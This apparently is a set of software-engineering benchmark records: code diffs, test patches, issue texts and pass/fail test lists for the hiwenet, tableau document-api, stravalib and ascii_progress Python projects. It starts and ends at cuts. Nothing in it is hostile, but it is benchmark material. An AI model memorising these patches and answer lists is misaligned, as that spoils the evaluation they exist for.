@@ -318,6 +326,8 @@ def extract(features, groups,
print('All exceptions encountered so far:\n {}'.format('\n'.join(exceptions_list)))
raise ValueError('Weights for atleast {:.2f}% of edges could not be computed.'.format(error_thresh * 100))
+ sys.stdout.write('\n')
+
if return_networkx_graph:
if out_weights_path is not None:
graph.write_graphml(out_weights_path)
@@ -492,16 +502,23 @@ def check_weight_method(weight_method_spec,
raise TypeError('allow_non_symmetric flag must be boolean')
if isinstance(weight_method_spec, str):
+ weight_method_spec = weight_method_spec.lower()
+
if weight_method_spec in list_medpy_histogram_metrics:
from medpy.metric import histogram as medpy_hist_metrics
weight_func = getattr(medpy_hist_metrics, weight_method_spec)
+ if use_orig_distr:
+ raise ValueError('use_original_distribution must be False when using builtin histogram metrics, '
+ 'which expect histograms as input.')
+
+ elif weight_method_spec in metrics_on_original_features:
+ weight_func = getattr(more_metrics, weight_method_spec)
+ if not use_orig_distr:
+ raise ValueError('use_original_distribution must be True when using builtin non-histogram metrics, '
+ 'which expect original feature values in ROI/node as input.')
else:
raise NotImplementedError('Chosen histogram distance/metric not implemented or invalid.')
- if use_orig_distr:
- raise ValueError('use_original_distribution must be False when using builtin histogram metrics, '
- 'which expect histograms as input.')
-
elif callable(weight_method_spec):
# ensure 1) takes two ndarrays
try:
|
raamana/hiwenet
|
7cf61bb7d3531408ef9c77fd81e1d15122e1bfa3
|
diff --git a/hiwenet/test_hiwenet.py b/hiwenet/test_hiwenet.py
index e1df71e..afa4ea6 100644
--- a/hiwenet/test_hiwenet.py
+++ b/hiwenet/test_hiwenet.py
@@ -9,8 +9,8 @@ from os.path import join as pjoin, exists as pexists, abspath
from sys import version_info
if version_info.major==2 and version_info.minor==7:
- from hiwenet import extract as hiwenet
- from hiwenet import run_cli as CLI
+ from pairwise_dist import extract as hiwenet
+ from pairwise_dist import run_cli as CLI
elif version_info.major > 2:
from hiwenet import extract as hiwenet
from hiwenet import run_cli as CLI
@@ -72,6 +72,25 @@ def test_dimensions():
assert len(ew) == num_groups
assert ew.shape[0] == num_groups and ew.shape[1] == num_groups
+def test_more_metrics():
+ ew = hiwenet(features, groups, weight_method='diff_medians',
+ use_original_distribution=True)
+ assert len(ew) == num_groups
+ assert ew.shape[0] == num_groups and ew.shape[1] == num_groups
+
+ ew_abs = hiwenet(features, groups, weight_method='diff_medians_abs',
+ use_original_distribution=True)
+ assert np.allclose(np.abs(ew), ew_abs, equal_nan=True)
+
+ with raises(ValueError):
+ ew = hiwenet(features, groups, weight_method='diff_medians',
+ use_original_distribution=False)
+
+ with raises(ValueError):
+ ew = hiwenet(features, groups,
+ weight_method='manhattan',
+ use_original_distribution=True)
+
def test_too_few_groups():
features, groups, group_ids, num_groups = make_features(100, 1)
with raises(ValueError):
@@ -256,6 +275,8 @@ def test_input_callable_on_orig_data():
use_original_distribution=True)
# test_directed_nx()
-test_directed_mat()
+# test_directed_mat()
# test_CLI_output_matches_API()
-# test_input_callable()
\ No newline at end of file
+# test_input_callable()
+
+test_more_metrics()
\ No newline at end of file
|
Broadening options for weight computation
Using the new feature of arbitrary callable, implement more useful weights
- [ ] such as difference in medians,
- [ ] correlation, thresholding etc
- [ ] other of interest
|
0.0
|
7cf61bb7d3531408ef9c77fd81e1d15122e1bfa3
|
[
"hiwenet/test_hiwenet.py::test_more_metrics",
"hiwenet/test_hiwenet.py::test_too_few_groups",
"hiwenet/test_hiwenet.py::test_too_few_values",
"hiwenet/test_hiwenet.py::test_invalid_trim_perc",
"hiwenet/test_hiwenet.py::test_invalid_weight_method",
"hiwenet/test_hiwenet.py::test_trim_not_too_few_values",
"hiwenet/test_hiwenet.py::test_trim_false_too_few_to_calc_range",
"hiwenet/test_hiwenet.py::test_not_np_arrays",
"hiwenet/test_hiwenet.py::test_CLI_nonexisting_paths",
"hiwenet/test_hiwenet.py::test_CLI_invalid_args",
"hiwenet/test_hiwenet.py::test_CLI_too_few_args",
"hiwenet/test_hiwenet.py::test_input_callable_on_orig_data"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-11-12 04:44:48+00:00
|
mit
| 5,148
|
|
tableau__document-api-python-15
|
diff --git a/tableaudocumentapi/datasource.py b/tableaudocumentapi/datasource.py
index 93ebe55..617004a 100644
--- a/tableaudocumentapi/datasource.py
+++ b/tableaudocumentapi/datasource.py
@@ -72,7 +72,7 @@ class Datasource(object):
"""
# save the file
- self._datasourceTree.write(self._filename)
+ self._datasourceTree.write(self._filename, encoding="utf-8", xml_declaration=True)
def save_as(self, new_filename):
"""
@@ -85,7 +85,7 @@ class Datasource(object):
Nothing.
"""
- self._datasourceTree.write(new_filename)
+ self._datasourceTree.write(new_filename, encoding="utf-8", xml_declaration=True)
###########
# name
diff --git a/tableaudocumentapi/workbook.py b/tableaudocumentapi/workbook.py
index 67dbc32..889f746 100644
--- a/tableaudocumentapi/workbook.py
+++ b/tableaudocumentapi/workbook.py
@@ -76,7 +76,7 @@ class Workbook(object):
"""
# save the file
- self._workbookTree.write(self._filename)
+ self._workbookTree.write(self._filename, encoding="utf-8", xml_declaration=True)
def save_as(self, new_filename):
"""
@@ -90,7 +90,7 @@ class Workbook(object):
"""
- self._workbookTree.write(new_filename)
+ self._workbookTree.write(new_filename, encoding="utf-8", xml_declaration=True)
###########################################################################
#
|
tableau/document-api-python
|
07aad9550d3d36a4d74c4751832c50fe81882a01
|
diff --git a/test.py b/test.py
index fd7d1bd..5606005 100644
--- a/test.py
+++ b/test.py
@@ -17,6 +17,7 @@ TABLEAU_10_WORKBOOK = '''<?xml version='1.0' encoding='utf-8' ?><workbook source
TABLEAU_CONNECTION_XML = ET.fromstring(
'''<connection authentication='sspi' class='sqlserver' dbname='TestV1' odbc-native-protocol='yes' one-time-sql='' server='mssql2012.test.tsi.lan' username=''></connection>''')
+
class HelperMethodTests(unittest.TestCase):
def test_is_valid_file_with_valid_inputs(self):
@@ -39,7 +40,6 @@ class ConnectionParserTests(unittest.TestCase):
self.assertIsInstance(connections[0], Connection)
self.assertEqual(connections[0].dbname, 'TestV1')
-
def test_can_extract_federated_connections(self):
parser = ConnectionParser(ET.fromstring(TABLEAU_10_TDS), '10.0')
connections = parser.get_connections()
@@ -97,6 +97,17 @@ class DatasourceModelTests(unittest.TestCase):
new_tds = Datasource.from_file(self.tds_file.name)
self.assertEqual(new_tds.connections[0].dbname, 'newdb.test.tsi.lan')
+ def test_save_has_xml_declaration(self):
+ original_tds = Datasource.from_file(self.tds_file.name)
+ original_tds.connections[0].dbname = 'newdb.test.tsi.lan'
+
+ original_tds.save()
+
+ with open(self.tds_file.name) as f:
+ first_line = f.readline().strip() # first line should be xml tag
+ self.assertEqual(
+ first_line, "<?xml version='1.0' encoding='utf-8'?>")
+
class WorkbookModelTests(unittest.TestCase):
@@ -122,7 +133,8 @@ class WorkbookModelTests(unittest.TestCase):
original_wb.save()
new_wb = Workbook(self.workbook_file.name)
- self.assertEqual(new_wb.datasources[0].connections[0].dbname, 'newdb.test.tsi.lan')
+ self.assertEqual(new_wb.datasources[0].connections[
+ 0].dbname, 'newdb.test.tsi.lan')
class WorkbookModelV10Tests(unittest.TestCase):
@@ -152,7 +164,19 @@ class WorkbookModelV10Tests(unittest.TestCase):
original_wb.save()
new_wb = Workbook(self.workbook_file.name)
- self.assertEqual(new_wb.datasources[0].connections[0].dbname, 'newdb.test.tsi.lan')
+ self.assertEqual(new_wb.datasources[0].connections[
+ 0].dbname, 'newdb.test.tsi.lan')
+
+ def test_save_has_xml_declaration(self):
+ original_wb = Workbook(self.workbook_file.name)
+ original_wb.datasources[0].connections[0].dbname = 'newdb.test.tsi.lan'
+
+ original_wb.save()
+
+ with open(self.workbook_file.name) as f:
+ first_line = f.readline().strip() # first line should be xml tag
+ self.assertEqual(
+ first_line, "<?xml version='1.0' encoding='utf-8'?>")
if __name__ == '__main__':
unittest.main()
|
Tabcmd publish with .twb created via Document API
I can successfully create a .twb file via the Document API, but attempting to publish it to my Tableau Server via Tabcmd results in an unexpected error:
**Bad request
unexpected error occurred opening the packaged workbook.**
Attached is the template workbook created in Tableau Desktop (superstore_sales.twb) and one of the workbooks created from that template via the Document API (superstore_sales_arizona.twb)
[superstore_twbs.zip](https://github.com/tableau/document-api-python/files/285303/superstore_twbs.zip)
|
0.0
|
07aad9550d3d36a4d74c4751832c50fe81882a01
|
[
"test.py::DatasourceModelTests::test_save_has_xml_declaration",
"test.py::WorkbookModelV10Tests::test_save_has_xml_declaration"
] |
[
"test.py::HelperMethodTests::test_is_valid_file_with_invalid_inputs",
"test.py::HelperMethodTests::test_is_valid_file_with_valid_inputs",
"test.py::ConnectionParserTests::test_can_extract_federated_connections",
"test.py::ConnectionParserTests::test_can_extract_legacy_connection",
"test.py::ConnectionModelTests::test_can_read_attributes_from_connection",
"test.py::ConnectionModelTests::test_can_write_attributes_to_connection",
"test.py::DatasourceModelTests::test_can_extract_connection",
"test.py::DatasourceModelTests::test_can_extract_datasource_from_file",
"test.py::DatasourceModelTests::test_can_save_tds",
"test.py::WorkbookModelTests::test_can_extract_datasource",
"test.py::WorkbookModelTests::test_can_update_datasource_connection_and_save",
"test.py::WorkbookModelV10Tests::test_can_extract_datasourceV10",
"test.py::WorkbookModelV10Tests::test_can_update_datasource_connection_and_saveV10"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2016-06-02 00:21:16+00:00
|
mit
| 5,823
|
|
stravalib__stravalib-454
|
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index c1e950f..26e03a2 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -25,7 +25,7 @@ default_stages: [commit]
repos:
# Misc commit checks
- repo: https://github.com/pre-commit/pre-commit-hooks
- rev: v4.4.0
+ rev: v4.5.0
# ref: https://github.com/pre-commit/pre-commit-hooks#hooks-available
hooks:
# Autoformat: Makes sure files end in a newline and only a newline.
@@ -37,14 +37,14 @@ repos:
# Linting code using ruff
- repo: https://github.com/astral-sh/ruff-pre-commit
- rev: v0.0.292
+ rev: v0.1.9
hooks:
- id: ruff
args: [--fix, --exit-non-zero-on-fix]
# Black for auto code formatting
- repo: https://github.com/psf/black
- rev: 23.9.1
+ rev: 23.12.1
hooks:
- id: black
entry: bash -c 'black "$@"; git add -u' --
diff --git a/changelog.md b/changelog.md
index d127d7c..8cfcf9e 100644
--- a/changelog.md
+++ b/changelog.md
@@ -2,12 +2,13 @@
## Unreleased
-- Fix: forgot to update model CI build to follow new src layout (@lwasser, #438)
+- Fix: Forgot to update model CI build to follow new src layout (@lwasser, #438)
- Fix: Type annotation on field that are of type timedelta are now correct (@enadeau, #440)
- Fix: Correct type for ActivityPhoto sizes attribute (@jsamoocha, #444)
- Fix: codespell config - ignore resources dir in tests (@lwasser, #445)
- Add: Support for Strava's new read rate limits (@jsamoocha, #446)
-- Fix: ignore documentation autogenerated api stubs (@lwasser, #447)
+- Fix: Ignore documentation autogenerated api stubs (@lwasser, #447)
+- Add: Improved handling of unexpected activity types (@jsamoocha, #454)
### Breaking Changes
diff --git a/src/stravalib/model.py b/src/stravalib/model.py
index 49d9e09..5879ae1 100644
--- a/src/stravalib/model.py
+++ b/src/stravalib/model.py
@@ -348,6 +348,30 @@ class BoundClientEntity(BaseModel):
bound_client: Optional[Any] = Field(None, exclude=True)
+class RelaxedActivityType(ActivityType):
+ @root_validator(pre=True)
+ def check_activity_type(cls, values: dict[str, Any]) -> dict[str, Any]:
+ v = values["__root__"]
+ if v not in get_args(ActivityType.__fields__["__root__"].type_):
+ LOGGER.warning(
+ f'Unexpected activity type. Given={v}, replacing by "Workout"'
+ )
+ values["__root__"] = "Workout"
+ return values
+
+
+class RelaxedSportType(SportType):
+ @root_validator(pre=True)
+ def check_sport_type(cls, values: dict[str, Any]) -> dict[str, Any]:
+ v = values["__root__"]
+ if v not in get_args(SportType.__fields__["__root__"].type_):
+ LOGGER.warning(
+ f'Unexpected sport type. Given={v}, replacing by "Workout"'
+ )
+ values["__root__"] = "Workout"
+ return values
+
+
class LatLon(LatLng, BackwardCompatibilityMixin, DeprecatedSerializableMixin):
"""
Enables backward compatibility for legacy namedtuple
@@ -935,7 +959,7 @@ class Segment(
map: Optional[Map] = None
athlete_segment_stats: Optional[AthleteSegmentStats] = None
athlete_pr_effort: Optional[AthletePrEffort] = None
- activity_type: Optional[ActivityType] = None # type: ignore[assignment]
+ activity_type: Optional[RelaxedActivityType] = None # type: ignore[assignment]
# Undocumented attributes:
start_latitude: Optional[float] = None
@@ -952,6 +976,7 @@ class Segment(
"elevation_high": uh.meters,
"elevation_low": uh.meters,
"total_elevation_gain": uh.meters,
+ "activity_type": enum_value,
}
_latlng_check = validator(
@@ -1040,6 +1065,8 @@ class Activity(
end_latlng: Optional[LatLon] = None
map: Optional[Map] = None
gear: Optional[Gear] = None
+ type: Optional[RelaxedActivityType] = None
+ sport_type: Optional[RelaxedSportType] = None
# Ignoring types here given there are overrides
best_efforts: Optional[list[BestEffort]] = None # type: ignore[assignment]
segment_efforts: Optional[list[SegmentEffort]] = None # type: ignore[assignment]
|
stravalib/stravalib
|
c6f8ad52994bc3e9f202a669087b82f560b5ed5a
|
diff --git a/src/stravalib/tests/unit/test_model.py b/src/stravalib/tests/unit/test_model.py
index b9c6074..ec01344 100644
--- a/src/stravalib/tests/unit/test_model.py
+++ b/src/stravalib/tests/unit/test_model.py
@@ -225,6 +225,23 @@ def test_backward_compatible_attribute_lookup(
assert not hasattr(lookup_expression, "bound_client")
+@pytest.mark.parametrize(
+ "klass,attr,given_type,expected_type",
+ (
+ (Activity, "type", "Run", "Run"),
+ (Activity, "sport_type", "Run", "Run"),
+ (Activity, "type", "FooBar", "Workout"),
+ (Activity, "sport_type", "FooBar", "Workout"),
+ (Segment, "activity_type", "Run", "Run"),
+ (Segment, "activity_type", "FooBar", "Workout"),
+ ),
+)
+def test_relaxed_activity_type_validation(
+ klass, attr, given_type, expected_type
+):
+ assert getattr(klass(**{attr: given_type}), attr) == expected_type
+
+
class ModelTest(TestBase):
def setUp(self):
super(ModelTest, self).setUp()
|
ENH: Graceful handling of Pydantic validation errors (for unexpected sports type / activity type)
### Feature Type
- [ ] Adding new functionality to stravalib
- [X] Changing existing functionality in stravalib
- [ ] Removing existing functionality in stravalib
### Problem Description
For unexpected activity/sport types, parsing `Activity` objects crashes with a Pydantic `ValidationError`. On (rare) occasions, these unexpected (and undocumented) types pop up in responses from Strava.
### Feature Description
We can add custom types and validators for (at least) the mentioned fields `activity_type` and `sports_type`. For unexpected types, we can then parse them and log a warning instead of crashing.
### Alternative Solutions
Unfeasible: requesting Strava to always keep the documentation 100% up-to-date.
### Additional Context
_No response_
### Code of Conduct
- [X] I agree to follow this project's Code of Conduct
|
0.0
|
c6f8ad52994bc3e9f202a669087b82f560b5ed5a
|
[
"src/stravalib/tests/unit/test_model.py::test_relaxed_activity_type_validation[Activity-type-FooBar-Workout]",
"src/stravalib/tests/unit/test_model.py::test_relaxed_activity_type_validation[Activity-sport_type-FooBar-Workout]",
"src/stravalib/tests/unit/test_model.py::test_relaxed_activity_type_validation[Segment-activity_type-Run-Run]",
"src/stravalib/tests/unit/test_model.py::test_relaxed_activity_type_validation[Segment-activity_type-FooBar-Workout]"
] |
[
"src/stravalib/tests/unit/test_model.py::TestLegacyModelSerialization::test_legacy_deserialize[Club-name-foo]",
"src/stravalib/tests/unit/test_model.py::TestLegacyModelSerialization::test_legacy_from_dict[Club-name-foo]",
"src/stravalib/tests/unit/test_model.py::TestLegacyModelSerialization::test_legacy_to_dict[Club-name-foo]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatibility_mixin_field_conversions[Club-raw0-foo]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatibility_mixin_field_conversions[ActivityTotals-raw1-expected_value1]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatibility_mixin_field_conversions[ActivityTotals-raw2-expected_value2]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatibility_mixin_field_conversions[Activity-raw3-expected_value3]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatibility_mixin_field_conversions[Club-raw4-expected_value4]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatibility_mixin_field_conversions[Activity-raw5-Run]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[Activity-raw0-expected_value0]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[Activity-raw1-None]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[Segment-raw2-None]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[SegmentExplorerResult-raw3-None]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[ActivityPhoto-raw4-None]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[Activity-raw5-None]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[Activity-raw6-expected_value6]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[BaseEffort-raw7-expected_value7]",
"src/stravalib/tests/unit/test_model.py::test_deserialization_edge_cases[ActivityLap-raw8-expected_value8]",
"src/stravalib/tests/unit/test_model.py::test_subscription_callback_field_names",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[None-None-False0]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[None-None-False1]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[1-1-False0]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression3-expected_result3-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression4-expected_result4-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression5-expected_result5-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[1-1-False1]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression7-expected_result7-None]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression8-expected_result8-True]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression9-expected_result9-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression10-expected_result10-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression11-expected_result11-None]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression12-expected_result12-True]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression13-expected_result13-None]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression14-expected_result14-True]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression15-expected_result15-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression16-expected_result16-False]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression17-expected_result17-None]",
"src/stravalib/tests/unit/test_model.py::test_backward_compatible_attribute_lookup[lookup_expression18-expected_result18-True]",
"src/stravalib/tests/unit/test_model.py::test_relaxed_activity_type_validation[Activity-type-Run-Run]",
"src/stravalib/tests/unit/test_model.py::test_relaxed_activity_type_validation[Activity-sport_type-Run-Run]",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_distance_units",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_entity_collections",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_speed_units",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_subscription_deser",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_subscription_update_deser",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_time_intervals",
"src/stravalib/tests/unit/test_model.py::ModelTest::test_weight_units"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-01-16 17:00:24+00:00
|
apache-2.0
| 5,749
|
|
Deric-W__ascii_progress-9
|
diff --git a/ascii_progress/__main__.py b/ascii_progress/__main__.py
index f5d1e15..b550f91 100644
--- a/ascii_progress/__main__.py
+++ b/ascii_progress/__main__.py
@@ -16,7 +16,7 @@ for frames in (
(">))'>", " >))'>", " >))'>", " <'((<", " <'((<", "<'((<")
):
sys.stdout.write("Working ")
- with Spinner(frames) as spinner:
+ with Spinner(frames).handle_exceptions("Done", "Exception") as spinner:
for _ in map(spinner.set_progress, range(1, 15)):
time.sleep(0.2)
@@ -29,6 +29,6 @@ for bar_format in map(
)
):
sys.stdout.write("Working ")
- with bar_format.bar(75) as bar:
+ with bar_format.bar(75).handle_exceptions("Done", "Exception") as bar:
for _ in bar:
time.sleep(0.02)
diff --git a/ascii_progress/bar.py b/ascii_progress/bar.py
index e660116..b5f0903 100644
--- a/ascii_progress/bar.py
+++ b/ascii_progress/bar.py
@@ -9,11 +9,23 @@ import sys
import math
from abc import abstractmethod
from string import Formatter
-from typing import Callable, Sequence, TextIO, Tuple, Iterator, ContextManager, Mapping, Any, Union
+from typing import (
+ Callable,
+ Sequence,
+ TextIO,
+ Tuple,
+ Iterator,
+ ContextManager,
+ Mapping,
+ Any,
+ Union,
+ TypeVar
+)
__all__ = (
"LazyFormatter",
"LAZY_FORMATTER",
+ "BarContext",
"Bar",
"ThresholdDecorator",
"PercentDecorator",
@@ -36,8 +48,48 @@ class LazyFormatter(Formatter):
LAZY_FORMATTER = LazyFormatter()
+T = TypeVar("T", bound="Bar")
+
+
+class BarContext(ContextManager[T]):
+ """context manager which handles exceptions while using a bar"""
+
+ bar: T
+
+ message: str
+
+ error: str
+
+ __slots__ = ("bar", "message", "error")
+
+ def __init__(self, bar: T, message: str, error: str) -> None:
+ self.bar = bar
+ self.message = message
+ self.error = error
+
+ def __eq__(self, other: object) -> bool:
+ if isinstance(other, BarContext):
+ return self.bar == other.bar \
+ and self.message == other.message \
+ and self.error == other.error
+ return NotImplemented
+
+ def __enter__(self) -> T:
+ return self.bar
+
+ def __exit__(self, type, value, traceback) -> bool: # type: ignore
+ if type is None:
+ self.bar.replace(self.message, end="\n")
+ elif type is KeyboardInterrupt:
+ # add 2 \b and 2 spaces to handle additional ^C
+ # add 2 additional spaces to make up for missing padding
+ self.bar.replace("\b\b" + self.error, end=" \n")
+ else:
+ self.bar.replace(self.error, end="\n")
+ return False # we dont handle exceptions
+
-class Bar(ContextManager["Bar"], Iterator[None]):
+class Bar(Iterator[None]):
"""abstract base class for progress bars"""
__slots__ = ()
@@ -49,16 +101,6 @@ class Bar(ContextManager["Bar"], Iterator[None]):
and self.width() == other.width()
return NotImplemented
- def __enter__(self) -> "Bar":
- return self
-
- def __exit__(self, type, value, traceback) -> bool: # type: ignore
- if type is KeyboardInterrupt: # handle ^C
- self.replace("\b\bKeyboardInterrupt", end=" \n")
- else:
- self.replace("Finished")
- return False # we dont handle exceptions
-
def __iter__(self) -> "Bar":
return self
@@ -97,6 +139,10 @@ class Bar(ContextManager["Bar"], Iterator[None]):
"""return the size of the bar"""
raise NotImplementedError
+ def handle_exceptions(self: T, message: str, error: str) -> BarContext[T]:
+ """return a context manager which replaces the bar with message or error if a exceptions is raised"""
+ return BarContext(self, message, error)
+
def ratio(self) -> float:
"""return the ration progress / target"""
return self.progress() / self.target()
@@ -271,16 +317,14 @@ class PercentDecorator(ThresholdDecorator):
@classmethod
def with_inferred_thresholds(cls, bar: Bar) -> "PercentDecorator":
"""create an instance with inferred thresholds"""
- lower_threshold, upper_threshold = calculate_thresholds(bar, 100)
- return cls(
- bar,
- lower_threshold,
- upper_threshold,
- )
+ return cls(bar, *calculate_thresholds(bar, 100))
def update_thresholds(self) -> None:
"""update lower and upper thresholds"""
- self.lower_threshold, self.upper_threshold = calculate_thresholds(self.bar, 100)
+ self.lower_threshold, self.upper_threshold = calculate_thresholds(
+ self.bar,
+ 100
+ )
class BarDecorator(ThresholdDecorator):
@@ -291,16 +335,14 @@ class BarDecorator(ThresholdDecorator):
@classmethod
def with_inferred_thresholds(cls, bar: Bar) -> "BarDecorator":
"""create an instance with inferred thresholds"""
- lower_threshold, upper_threshold = calculate_thresholds(bar, bar.width())
- return cls(
- bar,
- lower_threshold,
- upper_threshold,
- )
+ return cls(bar, *calculate_thresholds(bar, bar.width()))
def update_thresholds(self) -> None:
"""update lower and upper thresholds"""
- self.lower_threshold, self.upper_threshold = calculate_thresholds(self.bar, self.bar.width())
+ self.lower_threshold, self.upper_threshold = calculate_thresholds(
+ self.bar,
+ self.bar.width()
+ )
class BarFormat:
diff --git a/ascii_progress/spinner.py b/ascii_progress/spinner.py
index 17edecd..c3fc287 100644
--- a/ascii_progress/spinner.py
+++ b/ascii_progress/spinner.py
@@ -6,14 +6,55 @@
# SPDX-License-Identifier: MIT
import sys
-from typing import ContextManager, Iterator, TextIO, Sequence
+from typing import ContextManager, Iterator, TextIO, Sequence, TypeVar
__all__ = (
- "Spinner",
+ "SpinnerContext",
+ "Spinner"
)
+T = TypeVar("T", bound="Spinner")
-class Spinner(ContextManager, Iterator[None]):
+
+class SpinnerContext(ContextManager[T]):
+ """context manager which handles exceptions while using the spinner"""
+
+ spinner: T
+
+ message: str
+
+ error: str
+
+ __slots__ = ("spinner", "message", "error")
+
+ def __init__(self, spinner: T, message: str, error: str) -> None:
+ self.spinner = spinner
+ self.message = message
+ self.error = error
+
+ def __eq__(self, other: object) -> bool:
+ if isinstance(other, SpinnerContext):
+ return self.spinner == other.spinner \
+ and self.message == other.message \
+ and self.error == other.error
+ return NotImplemented
+
+ def __enter__(self) -> T:
+ return self.spinner
+
+ def __exit__(self, type, value, traceback) -> bool: # type: ignore
+ if type is None:
+ self.spinner.replace(self.message, end="\n")
+ elif type is KeyboardInterrupt:
+ # add 2 \b and 2 spaces to handle additional ^C
+ # add 2 additional spaces to make up for missing padding
+ self.spinner.replace("\b\b" + self.error, end=" \n")
+ else:
+ self.spinner.replace(self.error, end="\n")
+ return False # we dont handle exceptions
+
+
+class Spinner(Iterator[None]):
"""class for creating a spinning animation"""
frames: Sequence[str]
@@ -43,16 +84,6 @@ class Spinner(ContextManager, Iterator[None]):
and self.file is other.file
return NotImplemented
- def __enter__(self) -> "Spinner":
- return self
-
- def __exit__(self, type, value, traceback) -> bool: # type: ignore
- if type is KeyboardInterrupt: # add 2 \b and 2 spaces to handle additional ^C
- self.replace("\b\bKeyboardInterrupt", end=" \n")
- else:
- self.replace("Finished")
- return False # we dont handle exceptions
-
def __iter__(self) -> "Spinner":
return self
@@ -102,3 +133,7 @@ class Spinner(ContextManager, Iterator[None]):
# pad message to fully overwrite old frame and add end
self.file.write(message + " " * (len(self.current_frame) - len(message)) + end)
self.file.flush()
+
+ def handle_exceptions(self: T, message: str, error: str) -> SpinnerContext[T]:
+ """return a context manager which replaces the spinner with message or error if a exceptions is raised"""
+ return SpinnerContext(self, message, error)
|
Deric-W/ascii_progress
|
a5f5f2815ba25cdfdcf57a0f02c025ef9dc2a3b0
|
diff --git a/tests/test_bar.py b/tests/test_bar.py
index bfab94b..bc53278 100644
--- a/tests/test_bar.py
+++ b/tests/test_bar.py
@@ -5,8 +5,10 @@
import unittest
import unittest.mock
from io import StringIO
+from typing import ContextManager
from ascii_progress.bar import (
LAZY_FORMATTER,
+ BarContext,
Bar,
ASCIIBar,
ThresholdDecorator,
@@ -42,6 +44,58 @@ class TestLazyFormatter(unittest.TestCase):
)
+class BarSpinnerContext(unittest.TestCase):
+ """tests for BarContext"""
+
+ def test_eq(self) -> None:
+ """test BarContext.__eq__"""
+ format = BarFormat(("-[", "]-"), (" ", "=="), 5)
+ bar = ASCIIBar(format, file=StringIO())
+ contexts = [
+ BarContext(bar, "1", "2"),
+ BarContext(bar, "2", "2"),
+ BarContext(bar, "1", "1"),
+ BarContext(ASCIIBar(format, file=StringIO()), "1", "1")
+ ]
+ for context in contexts:
+ self.assertEqual(
+ [context],
+ [c for c in contexts if c == context]
+ )
+ self.assertNotEqual(contexts[0], 42)
+
+ def test_context(self) -> None:
+ """test SpinnerContext as context manager"""
+ output = StringIO()
+ bar = ASCIIBar(BarFormat(("[", "]"), (" ", "="), 3, format="{bar}"), file=output)
+ with BarContext(bar, "1", "2") as context:
+ self.assertIsInstance(context, Bar)
+ context.set_progress(34)
+ context.update()
+ with self.assertRaises(RuntimeError):
+ with BarContext(bar, "1", "2") as context:
+ context.set_progress(67)
+ context.update()
+ raise RuntimeError
+ with self.assertRaises(KeyboardInterrupt):
+ with BarContext(bar, "1", "2") as context:
+ context.set_progress(100)
+ context.update()
+ raise KeyboardInterrupt
+ self.assertEqual(
+ output.getvalue(),
+ "\b\b\b\b\b".join((
+ "[ ]",
+ "[= ]",
+ "1 \n",
+ "[== ]",
+ "2 \n",
+ "[===]",
+ "\b\b2 \n"
+ ))
+ )
+
+
class TestBar(unittest.TestCase):
"""Tests for Bar"""
@@ -76,18 +130,11 @@ class TestBar(unittest.TestCase):
break
self.assertEqual(next(iterations), 11)
- def test_enter(self) -> None:
- """test Bar.__enter__ and __exit__"""
- mock = unittest.mock.Mock(spec=Bar)
- self.assertIs(Bar.__enter__(mock), mock)
- self.assertFalse(Bar.__exit__(mock, None, None, None))
- self.assertFalse(Bar.__exit__(mock, KeyboardInterrupt, KeyboardInterrupt(), None))
- self.assertEqual(
- mock.replace.call_args_list,
- [
- unittest.mock.call("Finished"),
- unittest.mock.call("\b\bKeyboardInterrupt", end=" \n")
- ]
+ def test_handle_exceptions(self) -> None:
+ """test Bar.handle_exceptions"""
